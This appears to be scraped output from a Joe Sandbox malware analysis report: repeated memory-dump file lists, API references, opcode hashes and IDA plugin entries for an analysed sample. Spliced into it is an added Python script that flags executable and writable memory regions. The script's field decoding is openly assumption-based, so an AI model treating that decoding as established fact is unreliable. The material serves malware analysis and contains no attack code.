                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Initialize
                                                                                                                                                                                                                                          • String ID: c13L
                                                                                                                                                                                                                                          • API String ID: 2538663250-2793365725
                                                                                                                                                                                                                                          • Opcode ID: 2fdc08d9cd3290d78cb3de73233e3242bd5af7ef6e1cc30da4c964a22a84d08e
                                                                                                                                                                                                                                          • Instruction ID: 9afb5b1e0c9600e6d82159b647cad76aa22696055772563b9c783181e041add1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fdc08d9cd3290d78cb3de73233e3242bd5af7ef6e1cc30da4c964a22a84d08e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BB10670A10268DFEB29CF14C998BDEB7B5EF05304F9085D9E409A7281D775AAC8CF90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,002A5024,?,00000000,?,0029EE3F,?,00000004,00000000,?,?,?,00299714), ref: 0029B07E
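The dump file names under "Memory Dump Source" carry the region's base address in their fourth dot-separated field, which is what lets an analyst see that these functions were recovered from a mapped image at 0x260000 rather than from a private heap allocation. The script below is an added example, not part of the Joe Sandbox report or tooling: it parses such names and lists the regions that are both executable and writable, the usual place to look for code that was unpacked at run time. Only the base address field is confirmed by the report ("Offset: 00260000"); treating the fifth field as a winnt.h PAGE_* protection value and the seventh as a MEM_* region type is an assumption inferred from the values that appear in the listing (0x04, 0x40, 0x80 and 0x01000000 match PAGE_READWRITE, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY and MEM_IMAGE), and the sixth and eighth fields are kept raw. The sample names are copied from the list above.

```python
"""Parse Joe Sandbox memory-dump (.sdmp) names and flag executable+writable regions.

Added example. Decoding of the protection and type fields is an assumption inferred
from the values on the page (they match winnt.h PAGE_* and MEM_* constants).
"""
from collections import Counter
from dataclasses import dataclass

# winnt.h memory protection constants (low byte of the protection field)
PAGE_NAMES = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80
PAGE_WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80
# winnt.h region type constants (MEMORY_BASIC_INFORMATION.Type)
MEM_NAMES = {0x01000000: "MEM_IMAGE", 0x00040000: "MEM_MAPPED", 0x00020000: "MEM_PRIVATE"}


@dataclass(frozen=True)
class Sdmp:
    process_index: int   # field 1: index of the analysed process
    stage: int           # field 2: analysis stage at which the dump was taken
    dump_id: str         # field 3: opaque dump identifier, kept as text
    base: int            # field 4: region base address (confirmed by the report's Offset)
    protect: int         # field 5: assumed PAGE_* protection
    field6: int          # field 6: meaning unknown, kept raw
    mem_type: int        # field 7: assumed MEM_* region type
    field8: int          # field 8: meaning unknown, kept raw

    @property
    def protect_name(self) -> str:
        return PAGE_NAMES.get(self.protect & 0xFF, f"0x{self.protect:08x}")

    @property
    def type_name(self) -> str:
        return MEM_NAMES.get(self.mem_type, f"0x{self.mem_type:08x}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & PAGE_EXEC_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & PAGE_WRITE_MASK)


def parse_sdmp(name: str) -> Sdmp:
    """Split a dump file name into its eight dot-separated fields; reject anything else."""
    parts = name.strip().split(".")
    if len(parts) != 9 or parts[-1] != "sdmp":
        raise ValueError(f"not a Joe Sandbox memory dump name: {name!r}")
    pid, stage, dump_id, base, prot, f6, mtype, f8 = parts[:8]
    try:
        return Sdmp(int(pid, 16), int(stage, 16), dump_id, int(base, 16),
                    int(prot, 16), int(f6, 16), int(mtype, 16), int(f8, 16))
    except ValueError as exc:
        raise ValueError(f"malformed hex field in {name!r}") from exc


def rwx_regions(names) -> list[int]:
    """Base addresses of regions that are both executable and writable, ascending."""
    dumps = [parse_sdmp(n) for n in names]
    return sorted(d.base for d in dumps if d.executable and d.writable)


def protection_summary(names) -> dict[str, int]:
    """How many dumps carry each protection; a quick sanity check on the decoding."""
    return dict(Counter(parse_sdmp(n).protect_name for n in names))


# Names copied from the report's "Associated" list above.
SAMPLE_DUMPS = [
    "00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmp",
]

if __name__ == "__main__":
    for d in map(parse_sdmp, SAMPLE_DUMPS):
        print(f"{d.base:#010x} {d.protect_name:24} {d.type_name}")
    # executable+writable: ['0x261000', '0x2d7000', '0x431000']
    print("executable+writable:", [hex(b) for b in rwx_regions(SAMPLE_DUMPS)])
```

If the decoding assumption holds, the 0x04 region at the image base (the PE headers) is read/write only while the alternating 0x40/0x80 regions above it are executable, which is the pattern you expect from an image whose section rights were changed after mapping; if a future report uses different field semantics, `protection_summary` will show unnamed hex values and the assumption should be revisited.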
Memory Dump Source
• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
• Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                          • Opcode ID: 0c7e880dda4f22eda460ac1b98f7e6ad89d4fccd18201533563ac44ae9e0f482
                                                                                                                                                                                                                                          • Instruction ID: 7dd6b28cb5ce26cb1efd3c7693c028b8fd7e921d6edb0ddae71284908b9875ad
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c7e880dda4f22eda460ac1b98f7e6ad89d4fccd18201533563ac44ae9e0f482
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91E06D3517122796EE323A75AE89B6FA648DB423F0F151221EE6496190EB61DC3085E1
APIs
• GetFileAttributesA.KERNEL32(?,0026DA1D,?,?,?,?), ref: 002687B9
Memory Dump Source
• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
• Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_260000_file.jbxd
Yara matches
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 2f8720c1563c910d237564e9f16c4c3290dc0def88621290c8ea266ae70fcd41
• Instruction ID: d588f02ac3a94c82702be6d2984fd3610c6d20e6f40385d706a089053db12aa5
• Opcode Fuzzy Hash: 2f8720c1563c910d237564e9f16c4c3290dc0def88621290c8ea266ae70fcd41
• Instruction Fuzzy Hash: DEC08C2C03160189FD2D0D3802858A973494A477A83F41BC4E5704B1F1CE3578AB9210
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(?,0026DA1D,?,?,?,?), ref: 002687B9
Memory Dump Source
• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
• Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_260000_file.jbxd
Yara matches
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: bf1cf82ccb378b1f284b3089f50ab201182eccf75e73c2803b717ae45daefd04
• Instruction ID: 493ea10bf08b8ddeb6a0b267033992cb520f57dd5fee26d7cce62f28edf5c35d
• Opcode Fuzzy Hash: bf1cf82ccb378b1f284b3089f50ab201182eccf75e73c2803b717ae45daefd04
• Instruction Fuzzy Hash: 44C08C3C031201CAFA2D4E38428482972099A037283F00B88E5314B1F1CF32E8A7C6A0
Memory Dump Source
• Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 52787c71c6cc55b373a9516f8c8287118409d796ea35997848f66e54eef75ee6
• Instruction ID: 0e8ef854a2bfb3ffc92aedd6b7e0126d3098f0db312f709ab1d4c6c3073b08f9
• Opcode Fuzzy Hash: 52787c71c6cc55b373a9516f8c8287118409d796ea35997848f66e54eef75ee6
• Instruction Fuzzy Hash: C721F1FB28C654FDA28685C22B60AF63B3DE6C3730330806FF447D9042F2941A0976B2
Memory Dump Source
• Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8f8e4f2d59feddb0a643bac716adaf7ed6b2227feafeee4b3dee252bdb322a9e
• Instruction ID: 9b1de60e0994034ba50528edd9080d1b3e257d033ce39d68733fc8a0851d8ccb
• Opcode Fuzzy Hash: 8f8e4f2d59feddb0a643bac716adaf7ed6b2227feafeee4b3dee252bdb322a9e
• Instruction Fuzzy Hash: E211BBFB38C625FD308689D22B60AF62A3EE1D3730331C42EF407D5002F2846A4A79B1
Memory Dump Source
• Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4998b47e97684f714baf413db5078ab12ec1e2764857e4733d8084b855a2d3de
• Instruction ID: ddee381b06eba620cca31bf7d426d5826fa94a5b90ab37c1f51411e410ed7177
• Opcode Fuzzy Hash: 4998b47e97684f714baf413db5078ab12ec1e2764857e4733d8084b855a2d3de
• Instruction Fuzzy Hash: 2711CAFB38C614FD618694C22B60AF63A7EE2D3730331C02EF447D5002F2906A4A7AB1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
